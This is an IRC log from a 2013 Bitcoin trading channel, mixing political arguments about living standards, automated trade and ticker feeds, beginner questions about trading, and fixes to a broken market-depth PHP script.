i guess for some views that constitutes proof of progress. Mar 15 03:52:44 So? Mar 15 03:53:03 so nothing really, it's a little amusing, you'll grow out of it. Mar 15 03:53:13 lol Mar 15 03:53:35 ikr? Mar 15 03:53:48 people have never been this smart and yet men your age have never been this childish. Mar 15 03:53:50 [BTCTC] [BASIC-MINING] 1 @ 0.345 BTC [+] Mar 15 03:53:51 it's a paradox. Mar 15 03:54:14 So desperately certain; so patronizing. And you continue to rail against that which you have no control over; ineffective. Shouting into the wind. Mar 15 03:54:21 I'm fairly sure you have no idea how old I am. Mar 15 03:54:47 hm, if you won't think the question too much proof of my many and varied shortcomings, Mar 15 03:54:54 Pretend you are my better then. I'm confident you don't grow out of that no matter how true or untrue it may be. Mar 15 03:55:05 why do you presume to guess my emotional state ? does it help something ? Mar 15 03:55:25 Dinner time. Have fun talking to your echo chamber. Mar 15 03:55:30 laters. Mar 15 03:56:08 Emotions hinder rational thought Mar 15 03:56:40 well that's true. but he already got slapped once with the entire statistics thing. you'd expect people a little quicker on their feet. Mar 15 03:57:25 presume you don't understand what's being said because of the other person once, get shown better, stop making the assumption. at least for a wittle while. Mar 15 03:57:51 That seems reasonable to me Mar 15 04:05:23 midnightmagic: standards of living in developed countries have barely budged in 50 years outside of major improvements in communications Mar 15 04:06:47 midnightmagic: with all the productivity gains the government has said weve made over 50 years, 8 hours of work per week should be enough to afford a 1950's standard of living, yet today 2 income earners are required just to make ends meet Mar 15 04:10:12 RandolphDuke: That's not true at all re: not budged in 50 years. Mar 15 04:10:20 sure it is Mar 15 04:10:49 midnightmagic 44, gemini. Mar 15 04:11:00 o, there you are. Mar 15 04:11:04 name an innovation in the last 30 years that has improved your life other then the internet Mar 15 04:11:25 mobile phone Mar 15 04:11:27 gps Mar 15 04:11:30 microwave Mar 15 04:11:33 mri Mar 15 04:11:34 phones existed in the 50's Mar 15 04:11:52 fine, GSM then Mar 15 04:11:55 all of those are merely improvements of existing technology Mar 15 04:11:59 kakobrekla seriously tho, people need about 3 average incomes now to maintain a 1950s lifestyle. in the 80s needed two. Mar 15 04:12:02 soon will need four. Mar 15 04:12:26 yeah and? Mar 15 04:12:26 some households already have their kids working part time Mar 15 04:12:50 thats why bitcoin is 50 now Mar 15 04:12:58 right. Mar 15 04:12:59 the government has siphoned off the productivity gains through inflation/taxation and transfered them into none-return bearing investments Mar 15 04:13:03 squandered Mar 15 04:13:16 at least zee germans financed a united europe Mar 15 04:13:22 so they'll have a disaster to account for it. Mar 15 04:13:29 the us financed nothing in particular, a buncha lossy wars. Mar 15 04:13:44 european union is just a secular version of the holy roman empire Mar 15 04:13:51 its nothing new Mar 15 04:13:58 i think that's what they hoped it to be, but it didn't work out. Mar 15 04:14:11 i still dont see what the problem is Mar 15 04:14:19 infact its probably even worse now, since at least the emperors still feared divine punishment somewhat Mar 15 04:14:35 hre was politically very weak. Mar 15 04:14:45 look into it, it was an interesting time for freedom. Mar 15 04:15:09 1910 literacy rate: 7.7% = 92m * 1-0.077=84m, 2013 literacy rates for the US: 99% = 313m * 0.99 =309.9m 309.9m > 84m. Mar 15 04:15:19 those numbers are lies. Mar 15 04:15:33 Oh, sure. Make up a definition that makes you right. Mar 15 04:15:34 want me to pick up the reports that kids going to college today need to take basic literacy ? Mar 15 04:15:34 lol Mar 15 04:15:41 what i find most amusing about the US, is if you actually research what the so called tyrants extracted from the population it was roughly 5-10% of annual income Mar 15 04:15:45 have you spoken to one of these young hopefuls ? Mar 15 04:15:46 compare that to close to 50% now lol Mar 15 04:15:55 in a "free" country Mar 15 04:16:03 Considering 7.7% *couldn't read AT ALL* in 1910? Mar 15 04:16:12 over 10% can't read at all today. Mar 15 04:16:19 Anecdote proves everything, I always say. Right mircea? Mar 15 04:16:21 it's just they're carefully avoided when the statistics are made. Mar 15 04:16:30 just like the uynemployed doesn't include the homeless Mar 15 04:16:33 because they smell. Mar 15 04:16:36 And let's just make up some random numbers! 10% Mar 15 04:17:06 midnightmagic: go pull up a newspaper from 100-200 years ago and compare it to one today, the level of language was far higher + the ammount of information per page was astonishing Mar 15 04:17:10 #statsfail Mar 15 04:17:16 not how it works joe. Mar 15 04:17:20 do you mind if i call you joe ? Mar 15 04:17:40 Only if you mind me calling you fluffy the unicorn. Mar 15 04:17:53 you're already calling me mircea, so it's about fair. Mar 15 04:18:05 midnightmagic: if people were so well educated the unemployment rate wouldnt be as high, they would be able to figure out how to be productive from all their knowledge Mar 15 04:18:06 Okay fluffy. Mar 15 04:18:16 omg kids. Mar 15 04:18:18 o, a challenge ? mkay. Mar 15 04:18:41 for that matter i know you live in de soto, wisconsin, and that you collect, and what, and when you dated, and a whole other pile of stuff. Mar 15 04:18:45 Well? Courtesy's out the window, why not? Mar 15 04:18:49 i got it all because i asked, half hour ago or whatever. Mar 15 04:18:54 LOL Mar 15 04:18:57 Who, me? Mar 15 04:19:03 let's call the person joe. Mar 15 04:19:04 anyway. Mar 15 04:19:12 ... Wisconsin..? Mar 15 04:19:33 I thought I told you I'm Canadian. Mar 15 04:19:42 yeh Mar 15 04:19:59 Why would I be living in Wisconsin then? Mar 15 04:20:31 ... Mar 15 04:20:51 Is this another one of those things that isn't translating into English so well? Mar 15 04:21:09 it's a bizzare question, what, they shoot canadians in wisconsin ? or how should i know anyway Mar 15 04:22:16 whargarble. Mar 15 04:23:50 http://img.photobucket.com/albums/v680/Velvet42/motivational%20posters/whargarbl.jpg Mar 15 04:35:24 its official, we have a 'chain block', dub. http://www.bloomberg.com/video/bob-s-daily-buzzword-bitcoin-EJ04CzJbQsKJ6CqAsDI_WA.html Mar 15 04:38:03 in you chain blockin' yo forks Mar 15 04:38:06 get that fact into wikipedia! Mar 15 04:46:41 [MPEX] [S.DICE] 150 @ 0.00599963 = 0.8999 BTC [-] Mar 15 04:49:34 [MPEX] [S.MPOE] 3000 @ 0.00072139 = 2.1642 BTC [-] Mar 15 04:50:33 rofl chain block Mar 15 04:52:29 like cockblock Mar 15 04:52:37 but whit hain in it. Mar 15 04:57:02 [BTCTC] [CRYPTO-TRADE] 5 @ 0.2 = 1 BTC [+] Mar 15 04:58:34 [BTCTC] [GSDPT] 261 @ 0.005199 = 1.3569 BTC [+] Mar 15 05:01:13 [MPEX] [S.MPOE] 6450 @ 0.00072139 = 4.653 BTC [-] Mar 15 05:01:15 [MPEX] [S.MPOE] 1000 @ 0.00071103 = 0.711 BTC [-] Mar 15 05:01:16 [MPEX] [S.MPOE] 2100 @ 0.00071102 = 1.4931 BTC [-] Mar 15 05:08:41 hi all Mar 15 05:08:48 ;;ident Mar 15 05:08:49 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address 1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX Mar 15 05:09:02 ;;tslb Mar 15 05:09:04 howdy MJR_ Mar 15 05:09:05 Time since last block: 18 minutes and 5 seconds Mar 15 05:09:14 what's new :) Mar 15 05:09:43 ;;ticker Mar 15 05:09:44 BTCUSD ticker | Best bid: 47.39999, Best ask: 47.40000, Bid-ask spread: 0.00001, Last trade: 47.39999, 24 hour volume: 31666.06954211, 24 hour low: 46.05000, 24 hour high: 47.99000, 24 hour vwap: 47.29517 Mar 15 05:10:24 ;;goxlag Mar 15 05:10:26 0.250708 seconds Mar 15 05:10:51 ;;buy 48 Mar 15 05:10:52 (buy [--long] [at|@] []) -- Logs a buy order for units of , at a price of per unit, in units of . Use the optional field to put in any special notes. may include an arithmetical expression, and {mtgox(ask|bid|last)} to index price to mtgox ask, bid, or last price. May also include (1 more message) Mar 15 05:11:44 hmmm what's the command to see how many dollars to move to 48? **** BEGIN LOGGING AT Fri Mar 15 07:05:59 2013 Mar 15 07:11:00 [BTCTC] [PAJKA.BOND] 158 @ 0.1 = 15.8 BTC [+] Mar 15 07:12:40 [BTCTC] [CRYPTO-TRADE] 1 @ 0.2 BTC [+] Mar 15 07:18:19 jurov http://live.coinbr.com/ doesn't show anything to me, is my browser borkt ? Mar 15 07:21:57 mircea_popescu: I don't see anything either Mar 15 07:22:17 you know i can't see your name without thinking of portia de rossi Mar 15 07:22:23 lol Mar 15 07:22:34 not sure if that is good or bad Mar 15 07:22:40 but I like her... Mar 15 07:22:51 well... this tall blonde gorgeous lesbian chick. Mar 15 07:22:54 how bad can it be Mar 15 07:23:04 hehehe Mar 15 07:23:32 yeah...just not sure if I want people to associate me with a hot blonde lesbian Mar 15 07:24:36 and actually, talk about a trophy wife : she's maried to degeneres. Mar 15 07:26:28 http://cdn.evilbeetgossip.com/wp-content/uploads/2008/06/ellen_portia_kiss.jpg Mar 15 07:26:30 visual aid. Mar 15 07:26:48 http://www.huffingtonpost.com/max-keiser/is-bitcoin-money_b_2849031.html Mar 15 07:26:56 what does the libertard crowd wish to speak about ? Mar 15 07:27:10 NOT the virtues of bitcoin. the fascinating fact that one of them got some. Mar 15 07:27:20 navel grazing is becoming enshrined. Mar 15 07:27:21 lol Mar 15 07:27:29 max keiser is hilarious Mar 15 07:27:39 grazing or gazing? Mar 15 07:31:27 yes Mar 15 07:39:12 so, I was thinking an assurance contract could be a good way to start a unified clearing process for exchanges Mar 15 07:39:44 where m is 2/3 of n Mar 15 07:40:11 seems to me, that that is the only way you rival gox Mar 15 07:41:36 [MPEX] [S.DICE] 500 @ 0.00599963 = 2.9998 BTC [-] Mar 15 07:44:55 any thoughts on ppcoin? Mar 15 07:58:41 ;;tslb Mar 15 07:58:43 Time since last block: 2 minutes and 26 seconds Mar 15 08:07:58 i would've used bitpay, but they still haven't responded to my application and the certainly didn't respond b/f i had 90% finished my own system Mar 15 08:09:15 ya know, it really says something about their business if *i* can code a functional replacement for them before they even respond to me Mar 15 08:10:12 they did ask about volume tho, maybe they just see me as too small of a fish Mar 15 08:11:51 smickles: lol Mar 15 08:12:18 the finance guys I work with are like send it to India Mar 15 08:12:36 im like you don't get it...this is the fun part Mar 15 08:13:03 interesting convo in OTC Mar 15 08:13:10 heh, i had a lot of fun earlier getting and installing a 'proper' ssl cert Mar 15 08:13:38 you had to pay? Mar 15 08:14:33 mjr_: well, i didn't wan't to go with one of those 'free' providers, and my self-signed just wasn't cutting it anymore Mar 15 08:14:42 yeah Mar 15 08:14:50 what's the site, is it live? Mar 15 08:17:26 how do you see the banner? Mar 15 08:21:31 heh, the site is a wip Mar 15 08:21:44 the banner? Mar 15 08:21:55 for a room Mar 15 08:22:11 /topic you mean? Mar 15 08:24:44 ah thanks Mar 15 08:24:56 was looking for motd or something Mar 15 08:28:04 /motd is for the server Mar 15 08:28:23 also, usually the topic has more in it than a url Mar 15 08:31:44 lol so much drama pretty much on every channel and forum Mar 15 08:32:04 I scurry back to bitcoin-assets Mar 15 08:33:43 I've heard people say that it's not true that bitcoin isn't backed by anything; it's backed by drama. Mar 15 08:34:15 can't wait for a btc reality show Mar 15 08:37:44 you could have an amazing drama on amc about bitcoins Mar 15 08:38:09 miners, exchanges, Silk Road retailers Mar 15 08:39:03 irc ops Mar 15 08:39:16 so many stories to tell Mar 15 08:46:32 anyone taken a loan on btcjam? i have some question on it Mar 15 09:00:05 Ukto: from what i've seen btcjam is uh...dubious at best Mar 15 09:00:14 mostly SR activity, not much else Mar 15 09:00:31 once in a while something legit-seeming pops up, but given the rest of the loans on there...eh Mar 15 09:08:30 yawn Mar 15 09:08:34 ;;ticker Mar 15 09:08:34 BTCUSD ticker | Best bid: 46.60551, Best ask: 47.10799, Bid-ask spread: 0.50248, Last trade: 46.99588, 24 hour volume: 30482.99861105, 24 hour low: 46.05000, 24 hour high: 47.96000, 24 hour vwap: 47.17570 Mar 15 09:30:02 [HAVELOCK] [HIM] 1 @ 1.82 BTC [+] Mar 15 09:39:12 [BTCTC] [ESECURITYSABTC] 1 @ 0.32001 BTC [-] Mar 15 09:39:14 [BTCTC] [ESECURITYSABTC] 1 @ 0.32 BTC [-] Mar 15 09:39:27 [BTCTC] [ESECURITYSABTC] 5 @ 0.31 = 1.55 BTC [-] Mar 15 09:52:41 [BTCTC] [PAJKA.BOND] 1 @ 0.105 BTC [+] Mar 15 10:02:56 is jurov awake? Mar 15 10:12:11 alright, I think I'll be launching the MPEx GUI tomorrow (today after i sleep and such) Mar 15 10:12:21 :D Mar 15 10:21:11 >,> Mar 15 10:21:24 is it differnt Mar 15 10:21:29 than a native passtru Mar 15 10:21:31 from coinbr ? Mar 15 11:13:39 http://www.youtube.com/watch?v=ndshbH3qZ6Y Mar 15 11:13:43 ahahah stupid americans Mar 15 11:16:53 tiberiusiv yes? Mar 15 11:18:24 of course live.coinbr.com shows nothing Mar 15 11:18:37 Unterminated comment starting line 6 in
/home/polimedi/public_html/bitcoin/mpex-mktdepth-jsonp.php on line 6 Mar 15 11:18:47 mircea_popescu: check ur error logs Mar 15 11:26:15 Hi All :) Mar 15 11:46:20 jurov pm pls Mar 15 12:16:17 is there a site from which i can download the whole blockchain ? Mar 15 12:19:53 [MPEX] [S.MPOE] 6546 @ 0.00071102 = 4.6543 BTC [-] Mar 15 12:21:53 oizotov, there's a torrent Mar 15 12:21:53 oizotov, https://bitcointalk.org/index.php?topic=145386.0 Mar 15 12:32:54 i dont need bootstrap.dat im using old client and i need blk000X.dat Mar 15 12:35:43 oizotov http://bitcoin.stackexchange.com/questions/3551/how-can-one-download-the-initial-blockchain-data-files-securely Mar 15 12:41:32 [BTCTC] [BASIC-MINING] 1 @ 0.344 BTC [-] Mar 15 12:42:41 i dont find any mirror that works i tried to download them with the client its running 4-5 days already and havent finished downloading it ... Mar 15 12:44:46 https://bitcointalk.org/index.php?topic=152617.0 Mar 15 12:44:48 O_o Mar 15 12:44:59 time to punch gox in the face Mar 15 12:46:09 oizotov, use 0.8 then Mar 15 12:46:56 it's *not* broken, not even for mining, if blocksize limit stays unchanged Mar 15 12:47:16 my wallet doesnt load in 0.8 some version mismatch i guess Mar 15 12:48:13 pls ask in #bitcoin-dev then... Mar 15 12:48:23 ok thanks Mar 15 12:50:01 lol mpoe-pr immediately chimed in... she could have added "we dispensed of this problem completely, mpex withdrawals are deprecated." Mar 15 12:59:32 lol i don't see ANY problem with that mtgox announcement Mar 15 12:59:38 btc price indeed has gone up Mar 15 12:59:51 like 3x from the long-lasting 10-4usd Mar 15 12:59:54 10-14 usd* Mar 15 13:00:07 so isn't it quite clear that they will fix the limits too? Mar 15 13:00:10 maybe you dont, others do. Mar 15 13:00:24 well, what is the problem, then? =I Mar 15 13:00:40 the real withdrawal limit value is still bigger than it was with the 200 btc border Mar 15 13:00:43 if you dont have one doesnt mean it isnt there. Mar 15 13:00:57 well i can't even think of a problem so yeah... Mar 15 13:01:16 that Mar 15 13:01:26 that's also true they should now fix their fee structure, too Mar 15 13:01:38 or maybe not, in fact Mar 15 13:01:56 O_o Mar 15 13:02:13 maybe they had to lower the withdrawal limit cuz of some aml things? Mar 15 13:03:41 [MPEX] [S.MPOE] 250 @ 0.00072397 = 0.181 BTC [+] Mar 15 13:03:52 if it is an aml thing then they should tie the withdrawal limits to 7 day vwap equivalent of USD limits. Mar 15 13:28:53 [BTCTC] [ASICMINER-PT] 1 @ 0.769999 BTC [+] Mar 15 13:44:02 [HAVELOCK] [SDICE] 10 @ 0.5201 = 5.201 BTC [+] Mar 15 13:44:59 [BTCTC] [GSDPT] 2 @ 0.005199 = 0.0104 BTC [+] Mar 15 13:45:01 [HAVELOCK] [SDICE] 15 @ 0.5200001 = 7.8 BTC [-] Mar 15 13:46:00 [HAVELOCK] [SDICE] 10 @ 0.52 = 5.2 BTC [-] Mar 15 13:47:00 [HAVELOCK] [SDICE] 1 @ 0.511 BTC [-] Mar 15 13:47:02 [HAVELOCK] [SDICE] 5 @ 0.511 = 2.555 BTC [-] Mar 15 13:47:50 [BTCTC] [SYNERGY] 1 @ 0.049 BTC [-] Mar 15 13:48:01 [HAVELOCK] [SDICE] 1 @ 0.511 BTC [-] Mar 15 13:49:01 [HAVELOCK] [SDICE] 14 @ 0.5102 = 7.1428 BTC [-] Mar 15 13:50:01 [HAVELOCK] [SDICE] 8 @ 0.5101 = 4.0808 BTC [-] Mar 15 13:50:58 is there any where the BTC trading newb can go for learning the ropes? Mar 15 13:51:01 [HAVELOCK] [SDICE] 200 @ 0.51 = 102 BTC [-] Mar 15 13:52:01 [HAVELOCK] [SDICE] 9 @ 0.5005 = 4.5045 BTC [-] Mar 15 13:52:02 #bitcoin-assets Mar 15 13:52:38 the help here is not really for the newb Mar 15 13:52:52 its not? Mar 15 13:53:24 dunno Mar 15 13:53:26 you guys are very much in your own little all knowing group Mar 15 13:54:25 are you asking for yourself or someone else' Mar 15 13:54:35 myself Mar 15 13:54:45 well what do you want to know? Mar 15 13:55:00 [HAVELOCK] [SDICE] 106 @ 0.5003 = 53.0318 BTC [-] Mar 15 13:55:20 looking for stuff like chart reading and basics Mar 15 13:55:43 well for chart reading you can ask Enky Mar 15 13:56:30 you can start here http://btctrading.wordpress.com/ Mar 15 13:57:34 [BTCTC] [COGNITIVE] 1 @ 0.16799 BTC [+] Mar 15 13:57:37 [BTCTC] [COGNITIVE] 1 @ 0.168 BTC [+] Mar 15 13:57:49 yeah i saw that sight yesterday guess i should read up there...thanks Kako Mar 15 13:58:46 yeah enky is around here or join #bit4x, more techincal stuff is discussed there Mar 15 13:59:38 VWAP? see right there i'm lost....also aren't basic day trading how-to sites helpful for the basics? Mar 15 14:00:20 take your time, read, learn Mar 15 14:01:28 http://btctrading.wordpress.com/technical-background/ Mar 15 14:01:31 well S.DICE has already taught me my first lesson...that is the reason for interest Mar 15 14:01:46 check the pdfs here Mar 15 14:01:46 etc Mar 15 14:02:09 yep i am moving to the tablet for some reading...thanks again sir Mar 15 14:08:10 [BTCTC] [PAJKA.BOND] 2 @ 0.105 = 0.21 BTC [+] Mar 15 14:10:11 no prob Mar 15 14:10:29 ZedsterX bug Enky if you have issues understanding Mar 15 14:10:37 ;) Mar 15 14:14:03 will do ...and i'll tell you sent me :) Mar 15 14:31:05 [BTCTC] [CRYPTO-TRADE] 2 @ 0.2 = 0.4 BTC [+] Mar 15 14:50:26 !ticker m s.dice Mar 15 14:50:28 [MPEX:S.DICE] 1D: 0.00599963 / 0.00599963 / 0.00599963 (650 shares, 3.90 BTC), 7D: 0.005 / 0.00576119 / 0.006 (50615 shares, 291.60 BTC), 30D: 0.00300001 / 0.00613748 / 0.0069 (2388881 shares, 14,661.72 BTC) Mar 15 14:52:35 [BTCTC] [ASICMINER-PT] 2 @ 0.769999 = 1.54 BTC [+] Mar 15 15:01:47 ;;ticker Mar 15 15:01:48 BTCUSD ticker | Best bid: 47.29098, Best ask: 47.34967, Bid-ask spread: 0.05869, Last trade: 47.29098, 24 hour volume: 29361.03478444, 24 hour low: 46.05000, 24 hour high: 47.90000, 24 hour vwap: 47.08799 Mar 15 15:16:17 bfl site down - conspiraci Mar 15 15:17:03 [BTCTC] [S.DICE-PT] 12 @ 0.00575 = 0.069 BTC [+] Mar 15 15:22:33 !ticker h sdice Mar 15 15:22:35 [HAVELOCK:SDICE] 1D: 0.50030000 / 0.51111382 / 0.57000000 (427 shares, 218.24560150 BTC), 7D: 0.46050000 / 0.55100234 / 0.61999910 (1008 shares, 555.41036353 BTC), 30D: 0.37000000 / 0.61443452 / 0.75900000 (5555 shares, 3413.18378474 BTC) Mar 15 15:24:45 [BTCTC] [COGNITIVE] 1 @ 0.155 BTC [-] Mar 15 15:24:47 [BTCTC] [COGNITIVE] 1 @ 0.153 BTC [-] Mar 15 15:24:49 [BTCTC] [COGNITIVE] 2 @ 0.152 = 0.304 BTC [-] Mar 15 15:24:51 [BTCTC] [COGNITIVE] 5 @ 0.15001 = 0.7501 BTC [-] Mar 15 15:24:53 [BTCTC] [COGNITIVE] 2 @ 0.15 = 0.3 BTC [-] Mar 15 15:34:00 usagi: People like what I am doing or they wouldn't invest. Mar 15 15:34:07 yeah, people are also idiots. Mar 15 15:34:29 sorry, a > missing there, first line is a quote. Mar 15 15:36:17 [BTCTC] [S.DICE-PT] 15 @ 0.0051 = 0.0765 BTC [-] Mar 15 15:37:22 investing in metals doesn't make one an idiot, but trading btc for it is. Mar 15 15:48:56 [BTCTC] [S.DICE-PT] 15 @ 0.00555 = 0.0833 BTC [+] Mar 15 15:56:32 [BTCTC] [S.DICE-PT] 20 @ 0.0052 = 0.104 BTC [-] Mar 15 16:20:31 http://bitcointipper.com/index.html Mar 15 16:36:55 [BTCTC] [ASICMINER-PT] 3 @ 0.769999 = 2.31 BTC [+] Mar 15 16:36:57 [BTCTC] [ASICMINER-PT] 15 @ 0.77 = 11.55 BTC [+] Mar 15 16:36:59 [BTCTC] [ASICMINER-PT] 100 @ 0.77 = 77 BTC [+] Mar 15 16:38:59 [BTCTC] [ASICMINER-PT] 10 @ 0.789999 = 7.9 BTC [+] Mar 15 16:40:02 your site deadweasel? Mar 15 17:04:22 [BTCTC] [ASICMINER-PT] 2 @ 0.79 = 1.58 BTC [+] Mar 15 17:08:08 so i went on to research bit more about coinlab.. have to wade through bullshit like: Mar 15 17:08:16 When our team discussed how to tackle these issues in the US, it seemed clear that Mt. Gox had by far the best security record in the Bitcoin exchange landscape. Mar 15 17:10:05 [BTCTC] [ASICMINER-PT] 7 @ 0.79 = 5.53 BTC [+] Mar 15 17:11:19 since they are so good at security we decided to take that role out of their hands for all US customers Mar 15 17:16:06 shh Mar 15 17:16:12 you aren't supposed to read that Mar 15 17:40:19 [BTCTC] [ASICMINER-PT] 1 @ 0.79 BTC [+] Mar 15 17:44:05 [BTCTC] [COGNITIVE] 1 @ 0.151 BTC [+] Mar 15 17:44:07 [BTCTC] [COGNITIVE] 1 @ 0.15 BTC [-] Mar 15 17:44:09 [BTCTC] [COGNITIVE] 1 @ 0.13151 BTC [-] Mar 15 17:45:20 [BTCTC] [COGNITIVE] 3 @ 0.1012 = 0.3036 BTC [-] Mar 15 17:49:32 [MPEX] [S.MPOE] 3400 @ 0.00073667 = 2.5047 BTC [+] Mar 15 18:09:59 [HAVELOCK] [SDICE] 3 @ 0.52 = 1.56 BTC [+] Mar 15 18:10:01 [HAVELOCK] [SDICE] 1 @ 0.515 BTC [-] Mar 15 18:11:24 [BTCTC] [COGNITIVE] 1 @ 0.11 BTC [+] Mar 15 18:11:59 [HAVELOCK] [SDICE] 4 @ 0.51 = 2.04 BTC [-] Mar 15 18:16:59 [HAVELOCK] [SDICE] 57 @ 0.51 = 29.07 BTC [-] Mar 15 18:18:00 [HAVELOCK] [SDICE] 10 @ 0.51 = 5.1 BTC [-] Mar 15 18:23:59 [HAVELOCK] [HIM] 1 @ 1.7 BTC [-] Mar 15 18:24:59 [HAVELOCK] [HIM] 9 @ 1.82 = 16.38 BTC [+] Mar 15 18:25:01 [HAVELOCK] [HIM] 7 @ 1.83 = 12.81 BTC [+] Mar 15 18:25:59 [HAVELOCK] [SDICE] 7 @ 0.5715 = 4.0005 BTC [+] Mar 15 18:26:01 [HAVELOCK] [SDICE] 3 @ 0.572 = 1.716 BTC [+] Mar 15 18:26:02 [HAVELOCK] [SDICE] 1 @ 0.57377777 BTC [+] Mar 15 18:26:03 [HAVELOCK] [SDICE] 1 @ 0.57399999 BTC [+] Mar 15 18:26:04 [HAVELOCK] [SDICE] 9 @ 0.575 = 5.175 BTC [+] Mar 15 18:26:05 [HAVELOCK] [SDICE] 1 @ 0.5849999 BTC [+] Mar 15 18:26:06 [HAVELOCK] [SDICE] 10 @ 0.59 = 5.9 BTC [+] Mar 15 18:26:07 [HAVELOCK] [SDICE] 1 @ 0.59 BTC [+] Mar 15 18:27:59 [HAVELOCK] [KCIM] 4 @ 1.2 = 4.8 BTC [+] Mar 15 18:28:59 [HAVELOCK] [KCIM] 15 @ 1.3999 = 20.9985 BTC [+] Mar 15 18:29:00 [HAVELOCK] [KCIM] 1 @ 1.3999 BTC [+] Mar 15 18:29:59 [HAVELOCK] [SDICE] 2 @ 0.59 = 1.18 BTC [+] Mar 15 18:34:36 [BTCTC] [ASICMINER-PT] 30 @ 0.79 = 23.7 BTC [+] Mar 15 18:34:59 [HAVELOCK] [SDICE] 1 @ 0.59 BTC [+] Mar 15 18:37:09 [BTCTC] [ASICMINER-PT] 1 @ 0.79 BTC [+] Mar 15 18:37:32 [BTCTC] [ASICMINER-PT] 25 @ 0.79 = 19.75 BTC [+] Mar 15 18:39:16 http://24.media.tumblr.com/06921f0d1ca90226d64ecbd050b8bd68/tumblr_mjoij4XdBZ1qf0u3po1_500.jpg Mar 15 18:40:58 lol Mar 15 18:43:29 !ticker h sdice Mar 15 18:43:31 [HAVELOCK:SDICE] 1D: 0.50030000 / 0.51471736 / 0.59000000 (523 shares, 269.19717916 BTC), 7D: 0.50030000 / 0.55025058 / 0.61999910 (1102 shares, 606.37614115 BTC), 30D: 0.37000000 / 0.61284029 / 0.75900000 (5666 shares, 3472.35306240 BTC) Mar 15 18:45:14 [BTCTC] [ASICMINER-PT] 8 @ 0.79 = 6.32 BTC [+] Mar 15 18:50:59 [HAVELOCK] [SDICE] 1 @ 0.59 BTC [+] Mar 15 19:05:01 [BTCTC] [LTC-MINING] 8 @ 0.398 = 3.184 BTC [+] Mar 15 19:05:03 [BTCTC] [LTC-MINING] 2 @ 0.4 = 0.8 BTC [+] Mar 15 19:10:59 [HAVELOCK] [KCIM] 1 @ 1.3 BTC [-] Mar 15 19:11:33 [BTCTC] [ASICMINER-PT] 1 @ 0.79 BTC [+] Mar 15 19:11:59 [HAVELOCK] [HIM] 1 @ 1.999 BTC [+] Mar 15 19:12:59 [HAVELOCK] [SDICE] 4 @ 0.59 = 2.36 BTC [+] Mar 15 19:13:00 "NOTE: For your security, we automatically lock domain names 30 days after unlocking." Thanks GoDaddy... Mar 15 19:14:00 [HAVELOCK] [SDICE] 15 @ 0.59999 = 8.9999 BTC [+] Mar 15 19:14:59 [HAVELOCK] [SDICE] 9 @ 0.599999 = 5.4 BTC [+] Mar 15 19:25:23 ;;calc 0.21253985/[ticker --last] Mar 15 19:25:23 0.00447980555598 Mar 15 19:25:30 ;;calc 0.21253985*[ticker --last] Mar 15 19:25:30 10.083738518 Mar 15 19:29:11 http://gigaom.com/2013/03/15/finnish-development-firm-offers-to-pay-salaries-partly-in-bitcoins/ Mar 15 19:29:56 O_o Mar 15 19:30:08 [BTCTC] [COGNITIVE] 1 @ 0.159 BTC [+] Mar 15 19:30:12 [BTCTC] [COGNITIVE] 1 @ 0.1599 BTC [+] Mar 15 19:30:14 [BTCTC] [COGNITIVE] 1 @ 0.163 BTC [+] Mar 15 19:30:16 [BTCTC] [COGNITIVE] 1 @ 0.16439 BTC [+] Mar 15 19:30:18 [BTCTC] [COGNITIVE] 1 @ 0.19 BTC [+] Mar 15 19:45:24 !ticker h sdice Mar 15 19:45:25 [HAVELOCK:SDICE] 1D: 0.50030000 / 0.51892185 / 0.59999900 (550 shares, 285.40702016 BTC), 7D: 0.50030000 / 0.55155534 / 0.61999910 (1129 shares, 622.70598217 BTC), 30D: 0.37000000 / 0.61271479 / 0.75900000 (5692 shares, 3487.57260040 BTC) Mar 15 19:51:17 uh, mktdepth for live.coinbr still broken... should i duct tape it or wait for mircea? Mar 15 19:56:32 [BTCTC] [S.DICE-PT] 25 @ 0.0052 = 0.13 BTC [-] Mar 15 20:23:09 [MPEX] [S.MPOE] 3250 @ 0.0007249 = 2.3559 BTC [-] Mar 15 20:30:59 jurov heh. all better now Mar 15 20:31:20 in other news, josh-zerlan.com Mar 15 20:31:50 SyntaxError: missing ) after argument list Mar 15 20:31:52 [Break On This Error] Mar 15 20:31:53 , 610]]}, "X.IDIFF.SEP": {"S": [[235000000, 10]], "B": []}}); Mar 15 20:32:13 the code still isn't valid Mar 15 20:32:43 ah it begins with JurovP(JurovP({ Mar 15 20:32:57 thanks for mentioning me twice, not necessary :D Mar 15 20:34:29 also deposits flushed. Mar 15 20:35:32 ZedsterX you'll be well advised to remember chart reading as in, technical analysis is far from being accepted like newtonian mechanics is. Mar 15 20:35:46 lmao Mar 15 20:36:05 huh? Mar 15 20:36:28 double encapsulation ftw. test it j Mar 15 20:36:33 basically chart reading can be voodoo or hindsight 20/20 a lot of the time Mar 15 20:36:34 ZedsterX re your earlier ocmplaint. Mar 15 20:36:49 Parse error: syntax error, unexpected ')' in /home/polimedi/public_html/bitcoin/mpex-mktdepth-jsonp.php on line 37 Mar 15 20:36:57 no one was complaining about anything Mar 15 20:37:27 hum wtf is going on there Mar 15 20:37:38 mircea, just deprecate it :P Mar 15 20:37:42 i was asking for help...which as this proves this is not the place to do it Mar 15 20:37:44 hehe Mar 15 20:38:21 lol. Mar 15 20:38:35 Zed, mp is just saying, in your efforts to educate yourself, remember that chart reading isnt always reliable Mar 15 20:38:40 fucking caching makes things insane. Mar 15 20:39:02 or at least that's what they'e telling me in a doomed attempt to avoid the firing squad Mar 15 20:39:05 anyway. now! Mar 15 20:39:13 yes of course Mar 15 20:39:47 but it is an essential part of trading none the less Mar 15 20:39:54 \o/ live is working... but no trades happened today? argh Mar 15 20:40:08 ZedsterX doesn't have to be really. anyway, hard to know what is ofcourse and what isn't ofcourse from yoru pov, ya know ? Mar 15 20:40:38 [MPEX] [S.MPOE] 6546 @ 0.00071102 = 4.6543 BTC [- Mar 15 20:40:47 i see some at least. Mar 15 20:40:51 so then I put my question to you all knowing MP...where is a good place to read up on trading basics? Mar 15 20:40:55 ;bc,stats Mar 15 20:41:49 so, Luke Jr flew out to BFL to save the day huh? Mar 15 20:41:50 ZedsterX i have no idea man. Mar 15 20:41:53 maybe something like http://www.google.com/search?q=trading+basics&complete=0 ? Mar 15 20:41:58 (no sarcasm intended) Mar 15 20:42:05 tried that Mar 15 20:42:18 ah yes... http://mpex.co/mpex-rss.php has last trade from March 12 :( Mar 15 20:42:21 